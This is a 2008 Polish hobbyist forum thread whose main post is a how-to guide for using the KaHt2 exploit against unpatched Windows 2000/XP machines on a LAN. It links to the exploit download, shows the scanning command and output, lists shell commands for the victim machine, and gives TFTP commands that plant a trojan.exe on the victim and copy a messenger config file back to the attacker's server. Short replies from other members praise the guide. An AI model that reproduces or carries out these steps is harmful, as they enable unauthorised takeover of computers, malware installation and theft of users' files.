KaHt 2 włam przez LAN-a.

- Dj Suchy Dj KRMX
   http://www.djsuchy.pun.pl/index.php
- Off Top
   http://www.djsuchy.pun.pl/viewforum.php?id=8
- KaHt 2 włam przez LAN-a.
   http://www.djsuchy.pun.pl/viewtopic.php?id=47

Sonik - 2008-03-21 14:55:53

kaht2.zip

Kod:

http://www.haxorcitos.com/ficheros/kaht2.zip

1. Co to jest kaht
2. Jak go uzywac
3. Najwazniejsze komendy DOSu
4. Kopiujemy lub wysylamy plik na komputer ofiary

1.
Kaht jest to exploit wykorzystujacy dziure w systemach Windows 2k i XP dziura ta umozliwia przejecie hakerowi pelnej kontroli nad komputerem, na ktorym nie zostala zainstalowana latka na ta dziure. Dziure ta wykorzystuje robak blaster.

2.
A wiec jak go uzyc. Najpierw sciagamy kahta. Rozpakowujemy go do jakiegos folderu np c:kaht Teraz wlaczamy wiersz polecen. Aby to zrobic wciskamy START --} URUCHOM i piszemy: 'cmd' oczywiscie bez cudzyslowu. Pojawia sie nam dosowe okienko. Do obslugi kahta potrzebujemy przynajmniej minimalnej znajomosci komend dosu. Spis najwazniejszych komend zamieszcze w punkcie 3 tego FAQ. No wiec przechodzimy do folderu z kahtem i piszemy:

kaht [IP od ktorego zaczniemy poszukiwanie dziury w systemie] [IP na ktorym zakonczymy poszukiwanie dziury w systemie]

przyklad:
kaht 192.168.0.34 192.168.0.57
ok teraz kaht skanuje podany zakres ip w poszukiwaniu dziur widzimy cos takiego:

- Connecting to 192.168.0.41
Sending Exploit to a [WinXP] Server...FAILED
- Connecting to 192.168.0.46
Sending Exploit to a [WinXP] Server...FAILED
- Connecting to 192.168.0.50
Sending Exploit to a [WinXP] Server...FAILED
- Connecting to 192.168.0.44
Sending Exploit to a [WinXP] Server...FAILED

Oznacza to ze na wszystkich zeskanowanych komputerach jest zainstalowana lata na blastera. Dziwisz sie dlaczego nie zostaly zeskanowane wszystkie komputery z podanego zakresu a tylko cztery?? Dlatego ze pozostale komputery moga byc akurat wylaczone
Ktore komputery sa wlaczone mozemy sprawdzic komenda „net view” w cmd lub konsole.

No dobra jak znajdziemy komputer ktory nie ma zainstalowanej laty to pojawi nam sie cos takiego:

Mamy teraz pelna kontrole nad komputerem. Nie ma takiego luksusu jaki uzyskujemy poslugujac sie Trojanami. Komendy trzeba wpisywac z klawiatury. Spis najwazniejszych komend podany jest w punkcie 3.

3.
Najwazniejsze komendy:

dir - wyswietla spis wszystkich plikow i folderow znajdujacych sie w danym folderze.

cd - umozliwia przejscie do innego folderu {jak jestesmy w folderze C:windows i wpiszemy "cd system32" to przejdziemy do folderu C:windows system32. Jak wpiszemy "cd .." to przechodzimy o jeden stopien nizej czyli z foldery C:windowssystem32 z powrotem znajdziemy sie w folderze C:windows]

del [nazwa pliku] - usuwa podany plik {del c:windowswin.ini}

copy [plik do skopiowania] [plik gdzie ma byc skopiowany] - sluzy do kopiowania plikow, mozna takze zmieniac ich nazwe {copy C:autoexec.bat d:gryautoexec.bat skopiuje plik autoexec.bat do folderu d:gry, aby zmienic nazwe pliku piszemy: "copy C:autoexec.bat d:gryfrajer.txt" nie dosc ze skopiujemy plik do folderu d:gry to na dodatek zmienimy jego nazwe na frajer.txt]

4.
Aby wyslac plik lub skopiowac plik od ofiary bedziemy potrzebowac programu uctftp jest to program ktory zaklada u nas na komputerze serwer TFTP. A wiec sciagamy ten program. Uruchamiamy go. Teraz mamy odpalony na swoim kompie Server. Mozemy wiec sciagac i uploadowac cos od/do naszej ofiary. Uwaga: tam gdzie znajduje sie plik uctftp.exe tam beda sciagac sie pliki i tam musza byc pliki ktore chcesz przeslac!

Kod:

http://unitedcrew.net/download.php?file=54

aby wgrac komus jakis plik na twardy piszemy:

TFTP -i [swoje IP] GET [nazwa pliku ktory chcemy skopiowac musi on sie znajdowac w folderze serwera TFTP u mnie jest to C:tftp] [nazwa jaka ma miec plik na komputerze ofiary] czyli w naszym przypadku jak chcemy skopiowac ofierze plik trojan.exe to piszemy:

TFTP -i 192.168.0.23 GET trojan.exe C:windowstrojan.exe

Jak chcemy od kogos skopiowac jakis plik wtedy uzywamy tej samej komendy tylko piszemy troche inaczej

TFTP -i [swoje IP] PUT [sciezke do pliku ktory chcemy skopiowac] [nazwa juz skopiowanego pliku] teraz w praktyce wykorzystamy to:

TFTP -i 192.168.0.23 PUT C:gadu-gaduuserslamerconfig.dat config.dat i w rezultacie w folderze C:tftp pojawil nam sie plik config.dat Oczywiscie caly czas musimy miec w tle odpalony program uctftp. Np. :

KRMX - 2008-03-21 14:59:26

facet później na mój sie ktoś włamie!!!! :)

Sonik - 2008-03-23 23:59:27

spoko nikt sie nie wlamie. jesli masz neo to sie nie boj bo masz zmienne IP xD

suchykiller - 2008-04-02 23:19:34

na początku nawet nie chcialo mi sie tego czytac , ale teraz przestudiowalem to od deski do deski i stwierdzilem ze to jest supcio :D

Sonik - 2008-04-03 22:09:09

no widzisz suchy xD to jest odjazdowe ;p

www.goodboys.pun.pl www.rebeldebb.pun.pl www.ancientlegion.pun.pl www.provet3rans-clan.pun.pl www.pakama.pun.pl